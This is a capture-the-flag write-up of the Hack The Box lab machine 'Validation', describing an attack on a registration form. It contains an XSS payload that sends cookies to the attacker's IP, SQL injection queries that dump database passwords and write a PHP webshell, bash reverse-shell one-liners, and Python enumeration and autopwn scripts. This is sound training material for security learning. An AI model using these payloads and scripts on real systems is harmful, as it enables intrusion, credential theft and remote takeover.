
# Validation

**Date**: 15/06/2022

**Difficulty**: Easy

**CTF**: <https://app.hackthebox.com/machines/Validation>

***

Let’s start by checking that we can reach the target machine:

<figure><img src="/files/8BrVllw9Boe0sRWz6tCP" alt=""><figcaption></figcaption></figure>

Now, let’s scan the TCP Ports of the target machine:

<figure><img src="/files/eHQgWnuqFh9pcYhjvs1Y" alt=""><figcaption></figcaption></figure>

There are 4 open ports: 22 (ssh), 80 (http), 4566 (kwtc), 8080 (http-proxy).

Let’s try to gather more info of the services running in these ports:

<figure><img src="/files/56nrImHUEgbPR7h4Pz7E" alt=""><figcaption></figcaption></figure>

Port 4566 doesn’t seem to be running a kwtc service; that name is only nmap’s default label for the port number, not the result of version detection…

Let’s run a whatweb scan against the HTTP ports:

<figure><img src="/files/SvwNJWh1nBmLiw8ObICU" alt=""><figcaption></figcaption></figure>

Ok, let’s see how the website hosted on port 80 looks:

<figure><img src="/files/djKSIR9uAh42CdjAhUrF" alt=""><figcaption></figcaption></figure>

A simple form where you enter a username, select a country and add your entry by clicking the Join Now button.

Let’s do a test using angellm as username and Spain as country.

<figure><img src="/files/6jor5O7ZJGgjoz6n2Z8c" alt=""><figcaption></figcaption></figure>

The website displays it now. Interesting. Let’s try some payloads…

<figure><img src="/files/gQB1L929PpuRhLVmru8r" alt=""><figcaption></figcaption></figure>

Ok, the username is rendered back without any escaping, so the page is vulnerable to XSS.

<figure><img src="/files/Vxq0W8CwbipnkzuoC6jI" alt=""><figcaption></figcaption></figure>

The website is setting a cookie… Maybe we can use the XSS to try to grab the session cookie?

This payload sends the cookie, base64-encoded, to our machine:

`<script>fetch('http://10.10.14.234?cookie=' + btoa(document.cookie) );</script>`

Let’s start an HTTP server on our machine and submit the payload:

<figure><img src="/files/LzJLqOAkCThVznxRYFmY" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/QAq6SPIy0xyrIorhWay0" alt=""><figcaption></figcaption></figure>

I set my own cookie to the value captured by the script, but nothing changed after reloading the page. Let’s enumerate directories:

<figure><img src="/files/svn7jLVLZD6E5YG7wzrI" alt=""><figcaption></figcaption></figure>

It found the css and js directories, plus a server-status directory we don’t have permission to access.

Let’s enumerate .txt and .php files:

<figure><img src="/files/rpRJsRubmbwbS5QI429u" alt=""><figcaption></figcaption></figure>

The only PHP file we haven’t visited yet is config.php, and it renders an empty page (it most likely only defines variables, so there is nothing to output)… Let’s go back to the form.

I will intercept a request and this time I’ll modify the country:

`username=ll&country='`

<figure><img src="/files/my7YcQxALxkHKSWGB12H" alt=""><figcaption></figcaption></figure>

Mmm… a fatal error. Sounds good to me: the single quote broke the query, so the country parameter is probably injectable. Let’s find out how many columns the query returns with UNION:

`username=ll&country=' UNION SELECT 1 -- -`

<figure><img src="/files/hYftD2ZSVtg8tuz6exH3" alt=""><figcaption></figcaption></figure>

`username=ll&country=' UNION SELECT 1,2 -- -`

<figure><img src="/files/3QWV24FivoRvZGpp0VLU" alt=""><figcaption></figcaption></figure>

`UNION SELECT 1` works but `1,2` errors, so the original query returns a single column and every payload from here on selects one value. First, the name of the current database:

`' UNION SELECT database()--`

<figure><img src="/files/RsLdmvkeBYu9EGM7UIaT" alt=""><figcaption></figcaption></figure>

The database name is `registration`. Let’s see the tables of that database:

`' UNION SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'registration' -- -`

<figure><img src="/files/SlGHMy1ndGfpNMlSOFNz" alt=""><figcaption></figcaption></figure>

There is only one table, also called `registration`. Let’s find the column names of that table:

`' UNION SELECT group_concat(column_name) FROM information_schema.columns WHERE table_name = 'registration' -- -`

<figure><img src="/files/xyqN4mCjAvi7wttLtNT1" alt=""><figcaption></figcaption></figure>

Very interesting! There are 4 columns: `username`, `userhash`, `country` and `regtime`. Let’s try to extract all the usernames and user hashes:

<figure><img src="/files/xqHATzhUZVXBewCfojBp" alt=""><figcaption></figcaption></figure>

Mmm… not very interesting: `fff` and `ll` are the usernames I used while testing the SQLi, and there is no other user…
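The column-count test and the `database()`, `information_schema.tables` and `information_schema.columns` steps above can be scripted. The following Python is an added example, not the writeup’s own code: it sends the same MySQL payloads (the form field names `username`/`country` and the target URL are taken from this page) and wraps every extracted value between fixed delimiters so that parsing does not depend on the page’s HTML. So that it runs offline it also includes a constructed SQLite-backed stand-in for the vulnerable query, with its own dialect table; the `MYSQL` entries are what you would use against the box.

```python
#!/usr/bin/env python3
"""UNION-based SQLi enumeration: find the column count, then pull one value
per request out of the reflected page, delimited so parsing is layout-independent."""
import re
import sqlite3
from urllib.error import HTTPError
from urllib.parse import urlencode
from urllib.request import urlopen

LEFT, RIGHT = "qZxL", "qZxR"                       # delimiters unlikely to appear in normal output
MARKER_RE = re.compile(f"{LEFT}(.*?){RIGHT}", re.S)
ERROR_MARKER = "error"                             # substring of the page's "Fatal error" message

# Per dialect: how to wrap a value, and (select expression, FROM/WHERE tail) per step.
# MYSQL matches the queries used in the writeup; SQLITE only serves the offline stand-in.
MYSQL = {
    "wrap": "concat('{L}',{expr},'{R}')",
    "db": ("database()", ""),
    "tables": ("group_concat(table_name)",
               "FROM information_schema.tables WHERE table_schema=database()"),
    "columns": ("group_concat(column_name)",
                "FROM information_schema.columns WHERE table_name='{table}'"),
}
SQLITE = {
    "wrap": "'{L}'||({expr})||'{R}'",
    "db": ("'main'", ""),
    "tables": ("group_concat(name)", "FROM sqlite_master WHERE type='table'"),
    "columns": ("group_concat(name)", "FROM pragma_table_info('{table}')"),
}


def http_fetch(url, country):
    """POST the form (field names as seen on the page) and return the body,
    also on HTTP 500, which is where PHP prints the fatal error."""
    data = urlencode({"username": "whatever", "country": country}).encode()
    try:
        with urlopen(url, data=data, timeout=10) as r:
            return r.read().decode(errors="replace")
    except HTTPError as e:
        return e.read().decode(errors="replace")


def find_column_count(fetch, max_cols=10):
    """UNION SELECT 1, then 1,2, ... until the page stops returning an error."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        if ERROR_MARKER not in fetch(f"' UNION SELECT {cols} -- -"):
            return n
    return None


def extract(fetch, dialect, ncols, step, **fmt):
    """Run one enumeration step and return the value found between the delimiters."""
    expr, tail = dialect[step]
    wrapped = dialect["wrap"].format(L=LEFT, R=RIGHT, expr=expr.format(**fmt))
    cols = ",".join([wrapped] + ["NULL"] * (ncols - 1))   # pad any extra columns
    body = fetch(f"' UNION SELECT {cols} {tail.format(**fmt)} -- -")
    m = MARKER_RE.search(body)
    return m.group(1) if m else None


def enumerate_schema(fetch, dialect):
    """Column count -> database name -> tables -> columns of each table."""
    ncols = find_column_count(fetch)
    if ncols is None:
        raise RuntimeError("no UNION payload succeeded; is the error marker right?")
    db = extract(fetch, dialect, ncols, "db")
    tables = extract(fetch, dialect, ncols, "tables").split(",")
    columns = {t: extract(fetch, dialect, ncols, "columns", table=t).split(",")
               for t in tables}
    return {"columns_in_query": ncols, "database": db, "tables": columns}


class FakeTarget:
    """Constructed stand-in for the vulnerable page so the example runs offline:
    a real SQLite database behind a string-concatenated query that echoes the
    matching usernames, the way the registration page reflects its data."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.executescript("""
            CREATE TABLE registration(username TEXT, userhash TEXT, country TEXT, regtime TEXT);
            INSERT INTO registration VALUES ('ll', 'deadbeef', 'Spain', '2022-06-15');
        """)

    def fetch(self, country):
        sql = f"SELECT username FROM registration WHERE country = '{country}'"  # injectable
        try:
            rows = self.db.execute(sql).fetchall()
        except sqlite3.Error as e:
            return f"<b>Fatal error</b>: {e}"
        return "<ul>" + "".join(f"<li>{r[0]}</li>" for r in rows) + "</ul>"


if __name__ == "__main__":
    print(enumerate_schema(FakeTarget().fetch, SQLITE))
    # Against the box, with the MySQL queries from the writeup:
    # print(enumerate_schema(lambda c: http_fetch("http://10.129.85.205/", c), MYSQL))
```

The `NULL` padding covers targets whose query returns more than one column; on this box the count is 1. `ERROR_MARKER` should be tuned to whatever the target prints on a failed query, otherwise the column-count loop misreads a normal page as success.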

Let’s list all databases:

`' UNION SELECT concat(schema_name) FROM information_schema.schemata -- -`

<figure><img src="/files/h75BV8kv7akUYtGQtDez" alt=""><figcaption></figcaption></figure>

`' UNION SELECT concat(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema='mysql' -- -`

<figure><img src="/files/8YFonw4gA38DxNmCCnK9" alt=""><figcaption></figcaption></figure>

`' UNION SELECT concat(column_name) FROM information_schema.COLUMNS WHERE table_name='user' -- -`

<figure><img src="/files/icySskyEJQLHPhxGqxos" alt=""><figcaption></figcaption></figure>

`' UNION SELECT group_concat(User,':',Password SEPARATOR '<br>') FROM mysql.user -- -`

<figure><img src="/files/0HJhgwxqAkxJp68hCo21" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/NxpYGBz1SViJgu3yfGeH" alt=""><figcaption></figcaption></figure>

I tried to log in via SSH with that password, without success. Let’s see if we can write files through the SQLi (`INTO OUTFILE` only works if the database user has the `FILE` privilege and `secure_file_priv` doesn’t restrict the target directory):

`' UNION SELECT "Prueba de contenido" into outfile '/var/www/html/prueba.txt' -- -`

<figure><img src="/files/QYVrc8UScKz1a6FWpHak" alt=""><figcaption></figcaption></figure>

Yeah, we can: the file lands in the webroot and is served back, so the database user has the `FILE` privilege and MySQL can write there.

Let’s try to upload a php webshell!

`' UNION SELECT "<?php system($_REQUEST['cmd']); ?>" into outfile '/var/www/html/ws.php' -- -`

<figure><img src="/files/SbLiaM4a26L4XFk7ShBv" alt=""><figcaption></figcaption></figure>

Now we can run commands as www-data. Let’s try to obtain a reverse shell to work more comfortably:

`http://10.129.85.205/ws.php?cmd=bash -i >& /dev/tcp/10.10.14.234/443 0>&1`

<figure><img src="/files/0nx2stJ9v1yk7Qm3bMhk" alt=""><figcaption></figcaption></figure>

We didn’t get a reverse shell. The raw `&` in `>&` is a query-string separator, so PHP only received `bash -i >` in `cmd`. Let’s URL-encode it:

`http://10.129.85.205/ws.php?cmd=bash -i >%26 %2Fdev%2Ftcp%2F10.10.14.234%2F443 0>%261`

Same result, even though the whole command now arrives. PHP’s `system()` hands the command line to `/bin/sh -c`, and both the `/dev/tcp/...` pseudo-device and the `>&` redirection are bash features that `sh` doesn’t provide, so the one-liner has to be wrapped so that bash is the shell parsing it:

`http://10.129.85.205/ws.php?cmd=bash -c "bash -i >& /dev/tcp/10.10.14.234/443 0>&1"`

But URL-Encoded:

<figure><img src="/files/BrqLWdIChkYnM8UJUi9C" alt=""><figcaption></figcaption></figure>

Another way to gain access is to script an autopwn in Python like this one and run it:

```python
#!/usr/bin/python3

from pwn import *
import signal, sys, threading, requests

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

# Ctrl + C
signal.signal(signal.SIGINT, def_handler)

if len(sys.argv) != 3:
    log.failure("Usage: %s <ip-address> <filename>" % sys.argv[0])
    sys.exit(1)

# Global variables
ip_address = sys.argv[1]
filename = sys.argv[2]
main_url = "http://%s/" % ip_address
lhost = "10.10.14.234"   # attacker IP the reverse shell connects back to
lport = 443

def createFile():
    # Drop the PHP webshell into the webroot through the SQLi in the country field
    data_post = {
        'username' : 'whatever',
        'country' : """' UNION SELECT "<?php system($_REQUEST['cmd']); ?>" into outfile '/var/www/html/%s' -- -""" % filename
    }

    requests.post(main_url, data=data_post)

def getAccess():
    # Ask the webshell for a reverse shell; bash -c is needed because system() runs /bin/sh
    data_post = {
        'cmd' : "bash -c 'bash -i >& /dev/tcp/%s/%d 0>&1'" % (lhost, lport)
    }

    requests.post(main_url + filename, data=data_post)

if __name__ == '__main__':

    createFile()

    # Start listening before sending the request so the callback cannot arrive early
    shell = listen(lport, timeout=20)

    try:
        threading.Thread(target=getAccess, args=()).start()
    except Exception as e:
        log.error(str(e))

    shell.wait_for_connection()
    shell.interactive()
```

<figure><img src="/files/32OGtGjggYRzHQ1mc0GQ" alt=""><figcaption></figcaption></figure>

Ok, so we are logged in as www-data. Let’s see what we can find:

<figure><img src="/files/taWf0xpDmx4V94BJJjYk" alt=""><figcaption></figcaption></figure>

Config files often hold credentials, so let’s cat config.php:

<figure><img src="/files/Z1U00Fj9Cf0538ZCsgoY" alt=""><figcaption></figcaption></figure>

Yeah! There are some credentials here.

<figure><img src="/files/zeTyHHPn755u4BV4DRPF" alt=""><figcaption></figcaption></figure>

Investigating a little more we got the user flag.

Now we have to escalate privileges:

<figure><img src="/files/zNfk8ay1uIGtwtVmB78l" alt=""><figcaption></figcaption></figure>

There is no system user named uhc. Maybe root is reusing the password?

<figure><img src="/files/hnUxFoYkRH1u52up5kDs" alt=""><figcaption></figcaption></figure>

Yes, it is. And that’s how we obtain the root flag!

